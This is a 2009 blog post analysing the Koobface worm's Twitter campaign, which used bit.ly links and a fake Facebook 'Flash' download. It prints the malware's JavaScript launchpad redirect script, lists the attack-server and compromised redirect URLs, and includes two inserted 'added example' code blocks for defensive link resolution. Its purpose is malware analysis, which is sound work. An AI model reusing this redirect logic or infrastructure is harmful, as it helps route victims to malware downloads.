Koobface migrates to Twitter

by Jago Maniscalchi  //  August 10, 2009  //  Exploits and Malware  //  No comments

Koobface migrated to Twitter and launched a posting frenzy at the end of last week. In a bid to avoid detection it generates unique posts using bit.ly links and a series of suffixes, including “;)” and “OMFG!!”, which are appended to the original “My home video :) ” message.

Twitter has cleaned up the majority of the posts today – the screenshot below contains the few remaining affected tweets.

[Screenshot: koobface-twitter]

The links point to a new Facebook masquerade that invites the user to download ‘Flash’. This download contains the Koobface malware. The site is now down – the screenshot is from the viruslist.com analysis of the new Koobface variant.

[Screenshot: koobface-facebook]

A sensible place to start analysis seemed to be the bit.ly links. To work out where they were pointing, I used the Twitter search API to pull back 449 infected tweets. 415 unique bit.ly links were successfully extracted from these posts. By visiting the URLs and examining the Location: header, it is possible to see where the links point to.
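The workflow described above (extract the bit.ly links, follow each Location: header without rendering anything, count where the links end up), as an added example that is not code from the original post. The tweets and the network responses are constructed stand-ins with hypothetical hosts; `head()` is injected so the logic runs offline, and in practice would be a HEAD request with automatic redirects disabled.

```javascript
// Added example, not from the original post: pull bit.ly links out of Koobface
// tweets, follow the Location: header chain, and count destination hosts.
const SAMPLE_TWEETS = [                      // constructed, modelled on the post
  'My home video :) http://bit.ly/aaaa1 ;)',
  'My home video :) http://bit.ly/bbbb2 OMFG!!',
  'My home video :) http://bit.ly/aaaa1',    // duplicate link
  'My home video :) http://bit.ly/cccc3 ;)',
  'lunch was great today, no links here',
];
// Extract the unique bit.ly URLs from a list of tweet texts.
function extractBitlyLinks(tweets) {
  const re = /https?:\/\/bit\.ly\/[A-Za-z0-9]+/g;
  const found = new Set();
  for (const text of tweets) for (const m of text.match(re) || []) found.add(m);
  return [...found];
}

// Follow Location: headers without rendering any page content. `head(url)` is
// injected and returns { status, location } for one request; stops on a
// non-redirect status, a redirect loop, or maxHops.
function resolveChain(url, head, maxHops = 10) {
  const hops = [url];
  for (let i = 0; i < maxHops; i++) {
    const current = hops[hops.length - 1];
    const resp = head(current);
    if (!resp || resp.status < 300 || resp.status >= 400 || !resp.location) break;
    const next = new URL(resp.location, current).href; // Location may be relative
    if (hops.includes(next)) break;                     // redirect loop
    hops.push(next);
  }
  return hops;
}

// Count final-destination hosts: which servers carry most of the affected links.
function destinationHosts(links, head) {
  const counts = {};
  for (const link of links) {
    const chain = resolveChain(link, head);
    const host = new URL(chain[chain.length - 1]).hostname;
    counts[host] = (counts[host] || 0) + 1;
  }
  return counts;
}
// Constructed offline stand-in for the network; hosts are hypothetical.
const FAKE_RESPONSES = {
  'http://bit.ly/aaaa1': { status: 301, location: 'http://launchpad.example/beestc1ips/?youtube.com' },
  'http://bit.ly/bbbb2': { status: 301, location: 'http://attack.example/go/tw.php?id=2' },
  'http://bit.ly/cccc3': { status: 301, location: 'http://attack.example/go/tw.php?id=3' },
  'http://launchpad.example/beestc1ips/?youtube.com':
    { status: 302, location: 'http://attack.example/go/tw.php?youtube.com&domain=launchpad.example' },
};
const fakeHead = (url) => FAKE_RESPONSES[url] || { status: 200 };
```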

Most of the URLs extracted from the bit.ly links were unique, as a result of a unique identifier used by the new Koobface variant. The two URLs responsible for the majority (over 400) of the affected links are:


http://kukuruku-290709.com/go/tw.php?

http://uppinorr.se/publicm0vies/?

Both of these sites were unavailable today. The remainder, which all included the GET parameter “youtube.com”, actually redirected to kukuruku-290709.com in a rather complicated fashion. The sites used as redirect servers are:


Most of these sites (I haven’t checked them all) use JavaScript to forward to kukuruku-290709.com, generating the URL from a combination of the search term used (in this case “youtube.com”), the referrer (in this case a “twitter.com” address) and the particular launchpad used.

The site first defines the domain name used for the resultant URL and extracts the search term.

// KROTEG
// Base URL of the attack server (both variants are identical in this sample).
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
// Copy of the query string, e.g. "?youtube.com" for the links seen on Twitter.
var ss = '' + location.search;
// Choose the base depending on whether a query string is present.
var abc;
if ((location.search).length > 0) abc = abc1; else abc = abc2;

A series of redirects is defined. These determine which PHP script is called on the attack server. Users clicking a Koobface link on facebook.com (as determined by document.referrer), for example, will end up visiting http://kukuruku-290709.com/go/fb.php. It isn’t clear to me why this happens. Presumably it is used to control which one of a number of masquerade sites is shown. It would perhaps make more sense to show a Twitter user a Twitter site than a Facebook site.

// Referrer domain -> attack server script. The first matching entry wins.
var redirects = [
  ['facebook.com',   abc + 'fb.php'],
  ['tagged.com',     abc + 'tg.php'],
  ['friendster.com', abc + 'fr.php'],
  ['myspace.com',    abc + 'ms.php'],
  ['msplinks.com',   abc + 'ms.php'],
  ['myyearbook.com', abc + 'yb.php'],
  ['fubar.com',      abc + 'fu.php'],
  ['twitter.com',    abc + 'tw.php'],
  ['hi5.com',        abc + 'hi5.php'],
  ['bebo.com',       abc + 'be.php']
];
// The referring page, and a flag recording whether a match was found.
var s = '' + document.referrer, r = false;

The code loops through the defined referrer domains and the appropriate PHP file is chosen. A URL is constructed that inserts the original search term (“youtube.com” in all our examples) and then appends a second parameter (“domain”) which is set to the host of the redirect server.

If no referrer match is found, the default index.php is used, and no “domain” parameter is passed.

// Walk the referrer table; indexOf() matches the domain anywhere in the referrer string.
for (var i = 0; i < redirects.length; i++) {
  if (s.indexOf(redirects[i][0]) != -1) {
    // Script for this referrer, followed by the original query string ("?youtube.com").
    var redir = redirects[i][1] + location.search;
    // Append the launchpad host as "domain", using & or ? depending on whether a query string exists.
    if ((location.search).length > 0) redir = redir + '&domain=' + location.host;
    else redir = redir + '?domain=' + location.host;
    location.href = redir;
    r = true;
    break;
  }
}
// No referrer match: fall back to index.php with the query string but no "domain" parameter.
if (!r) location.href = abc + 'index.php' + location.search;
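The launchpad's redirect logic rewritten as a side-effect-free function, as an added example that is not code from the original post: it lets an analyst compute where a given launchpad URL would send a visitor (and enumerate every attack-server endpoint a launchpad can produce) without loading the page, and pull the launchpad host back out of a URL seen in proxy logs. The attack-server base and the referrer table are copied from the script above; the host `launchpad.example` used in the checks is hypothetical.

```javascript
// Added example, not from the original post: the launchpad's redirect logic as a
// pure function, so an analyst can compute where a launchpad URL sends a visitor
// without loading the page. Arguments mirror document.referrer, location.search
// and location.host from the script above; the table is copied from it.
const ATTACK_BASE = 'http://kukuruku-290709.com/go/';
const REFERRER_MAP = [
  ['facebook.com', 'fb.php'], ['tagged.com', 'tg.php'], ['friendster.com', 'fr.php'],
  ['myspace.com', 'ms.php'], ['msplinks.com', 'ms.php'], ['myyearbook.com', 'yb.php'],
  ['fubar.com', 'fu.php'], ['twitter.com', 'tw.php'], ['hi5.com', 'hi5.php'],
  ['bebo.com', 'be.php'],
];

// Which attack-server script a visitor is sent to. First substring match wins,
// exactly like the original loop (any referrer containing "twitter.com" counts).
function predictLanding(referrer, search, host, base = ATTACK_BASE) {
  const hit = REFERRER_MAP.find(([domain]) => referrer.indexOf(domain) !== -1);
  if (!hit) return base + 'index.php' + search;          // no match: no domain param
  const sep = search.length > 0 ? '&' : '?';
  return base + hit[1] + search + sep + 'domain=' + host;
}

// Every attack-server URL a given launchpad host can generate, for blocklists
// and proxy-log matching (myspace.com and msplinks.com collapse to one entry).
function enumerateEndpoints(host, search = '?youtube.com') {
  const urls = REFERRER_MAP.map(([d]) => predictLanding('http://' + d + '/', search, host));
  urls.push(predictLanding('', search, host));
  return [...new Set(urls)];
}

// Given a URL seen in proxy or DNS logs, report whether it is an attack-server
// hit and, if so, which launchpad host the victim was bounced through.
function classifyHit(url, base = ATTACK_BASE) {
  const u = new URL(url);
  const b = new URL(base);
  if (u.hostname !== b.hostname || !u.pathname.startsWith(b.pathname)) return null;
  return { script: u.pathname.slice(b.pathname.length), launchpad: u.searchParams.get('domain') };
}
```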

Using patterns in the redirect servers’ URLs, a few additional sites were discovered that also point to the same attack server.


http://www.vernonvalleypt.com/c00lttube/

http://www.solardynamicsinc.com/privaleacti0n/

http://www.jsft.org.sa/fuunnydem0nstrati0n/

While the majority of the redirect servers are still online, the two attack servers are now offline. Because all links ultimately end at those two offline sites, this iteration of Koobface is effectively finished.

About the Author

Jago Maniscalchi is a Cyber security consultant, though he tries to avoid the word "Cyber" at all costs. He has spent 15 years working with Information Systems and has experience in website hosting, software engineering, infrastructure management, data analysis and security assessment. Jago lives in London with his family, enough pets to start a small zoological society, and a Samsung NaviBot Robotic Vacuum Cleaner. Despite an aptitude for learning computer languages, his repeated attempts to learn Italian have resulted in spectacular failure.
